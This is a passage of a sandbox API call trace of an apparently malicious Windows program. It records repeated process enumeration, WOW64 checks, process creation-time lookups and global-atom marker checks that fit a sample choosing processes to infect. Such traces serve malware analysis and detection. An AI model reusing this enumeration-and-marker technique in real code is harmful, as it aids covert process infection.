	[0122.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.869] CloseHandle (hObject=0x698) returned 1
	[0122.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.870] CloseHandle (hObject=0x698) returned 1
	[0122.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.871] CloseHandle (hObject=0x698) returned 1
	[0122.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.871] CloseHandle (hObject=0x698) returned 1
	[0122.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.871] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.871] CloseHandle (hObject=0x698) returned 1
	[0122.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9938, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.872] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.872] CloseHandle (hObject=0x698) returned 1
	[0122.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9a28, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.872] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.872] CloseHandle (hObject=0x698) returned 1
	[0122.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.872] GetLastError () returned 0x5
	[0122.873] GetLastError () returned 0x5
	[0122.873] GetLastError () returned 0x5
	[0122.873] GetLastError () returned 0x5
	[0122.873] GetLastError () returned 0x5
	[0122.873] GetLastError () returned 0x5
	[0122.873] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.927] GetLastError () returned 0x5
	[0122.928] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.928] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.928] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] GetLastError () returned 0x5
	[0122.928] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.929] GetLastError () returned 0x5
	[0122.930] GetLastError () returned 0x5
	[0122.930] GetLastError () returned 0x5
	[0122.930] GetLastError () returned 0x5
	[0122.930] GetLastError () returned 0x5
	[0122.930] GetLastError () returned 0x5
	[0122.930] GetLastError () returned 0x5
	[0122.930] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.931] GetLastError () returned 0x5
	[0122.932] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.932] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.932] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.932] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.932] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.932] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.932] CloseHandle (hObject=0x698) returned 1
	[0122.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.933] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.933] CloseHandle (hObject=0x698) returned 1
	[0122.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.933] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.933] CloseHandle (hObject=0x698) returned 1
	[0122.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.934] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.934] CloseHandle (hObject=0x698) returned 1
	[0122.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.934] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.934] CloseHandle (hObject=0x698) returned 1
	[0122.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a30, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.975] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.978] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.978] CloseHandle (hObject=0x424) returned 1
	[0122.978] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.978] CloseHandle (hObject=0x424) returned 1
	[0122.979] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.979] CloseHandle (hObject=0x424) returned 1
	[0122.979] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.979] CloseHandle (hObject=0x424) returned 1
	[0122.979] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.979] CloseHandle (hObject=0x424) returned 1
	[0122.979] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.979] CloseHandle (hObject=0x424) returned 1
	[0122.979] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.979] CloseHandle (hObject=0x424) returned 1
	[0122.980] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.980] CloseHandle (hObject=0x424) returned 1
	[0122.980] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.980] CloseHandle (hObject=0x424) returned 1
	[0122.980] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.980] CloseHandle (hObject=0x424) returned 1
	[0122.984] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.984] CloseHandle (hObject=0x424) returned 1
	[0122.984] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.985] CloseHandle (hObject=0x424) returned 1
	[0122.985] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.985] CloseHandle (hObject=0x424) returned 1
	[0122.985] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.985] CloseHandle (hObject=0x424) returned 1
	[0122.985] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.985] CloseHandle (hObject=0x424) returned 1
	[0122.985] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.985] CloseHandle (hObject=0x424) returned 1
	[0122.986] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.986] CloseHandle (hObject=0x424) returned 1
	[0122.986] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.986] CloseHandle (hObject=0x424) returned 1
	[0122.986] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.986] CloseHandle (hObject=0x424) returned 1
	[0122.986] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.987] CloseHandle (hObject=0x424) returned 1
	[0122.987] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.987] CloseHandle (hObject=0x424) returned 1
	[0122.987] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.987] CloseHandle (hObject=0x424) returned 1
	[0122.987] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.987] CloseHandle (hObject=0x424) returned 1
	[0122.987] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.987] CloseHandle (hObject=0x424) returned 1
	[0122.988] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.988] CloseHandle (hObject=0x424) returned 1
	[0122.988] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.988] CloseHandle (hObject=0x424) returned 1
	[0122.988] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.988] CloseHandle (hObject=0x424) returned 1
	[0122.988] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.988] CloseHandle (hObject=0x424) returned 1
	[0122.988] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.989] CloseHandle (hObject=0x424) returned 1
	[0122.989] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.989] CloseHandle (hObject=0x424) returned 1
	[0122.989] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.989] CloseHandle (hObject=0x424) returned 1
	[0122.989] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.990] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.990] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.990] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.990] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.990] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.991] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.991] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.991] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.991] CloseHandle (hObject=0x424) returned 1
	[0122.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.991] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.991] CloseHandle (hObject=0x424) returned 1
	[0122.991] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.992] CloseHandle (hObject=0x424) returned 1
	[0122.992] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.992] CloseHandle (hObject=0x424) returned 1
	[0122.992] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.992] CloseHandle (hObject=0x424) returned 1
	[0123.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0123.043] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0123.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0123.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.048] CloseHandle (hObject=0x2dc) returned 1
	[0123.048] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.048] CloseHandle (hObject=0x2dc) returned 1
	[0123.049] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.049] CloseHandle (hObject=0x2dc) returned 1
	[0123.049] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.049] CloseHandle (hObject=0x2dc) returned 1
	[0123.049] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.049] CloseHandle (hObject=0x2dc) returned 1
	[0123.049] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.049] CloseHandle (hObject=0x2dc) returned 1
	[0123.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.050] CloseHandle (hObject=0x2dc) returned 1
	[0123.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.050] CloseHandle (hObject=0x2dc) returned 1
	[0123.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.050] CloseHandle (hObject=0x2dc) returned 1
	[0123.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.050] CloseHandle (hObject=0x2dc) returned 1
	[0123.050] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.050] CloseHandle (hObject=0x2dc) returned 1
	[0123.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.051] CloseHandle (hObject=0x2dc) returned 1
	[0123.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.051] CloseHandle (hObject=0x2dc) returned 1
	[0123.051] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.051] CloseHandle (hObject=0x2dc) returned 1
	[0123.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.052] CloseHandle (hObject=0x2dc) returned 1
	[0123.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.052] CloseHandle (hObject=0x2dc) returned 1
	[0123.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.052] CloseHandle (hObject=0x2dc) returned 1
	[0123.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.052] CloseHandle (hObject=0x2dc) returned 1
	[0123.052] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.052] CloseHandle (hObject=0x2dc) returned 1
	[0123.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.053] CloseHandle (hObject=0x2dc) returned 1
	[0123.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.053] CloseHandle (hObject=0x2dc) returned 1
	[0123.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.053] CloseHandle (hObject=0x2dc) returned 1
	[0123.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.053] CloseHandle (hObject=0x2dc) returned 1
	[0123.053] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.053] CloseHandle (hObject=0x2dc) returned 1
	[0123.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.054] CloseHandle (hObject=0x2dc) returned 1
	[0123.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.054] CloseHandle (hObject=0x2dc) returned 1
	[0123.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.054] CloseHandle (hObject=0x2dc) returned 1
	[0123.054] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.054] CloseHandle (hObject=0x2dc) returned 1
	[0123.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.055] CloseHandle (hObject=0x2dc) returned 1
	[0123.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.055] CloseHandle (hObject=0x2dc) returned 1
	[0123.055] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.055] CloseHandle (hObject=0x2dc) returned 1
	[0123.055] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.055] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.056] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.056] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.056] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.056] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.056] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.056] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.057] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.057] CloseHandle (hObject=0x2dc) returned 1
	[0123.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.057] CloseHandle (hObject=0x2dc) returned 1
	[0123.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.057] CloseHandle (hObject=0x2dc) returned 1
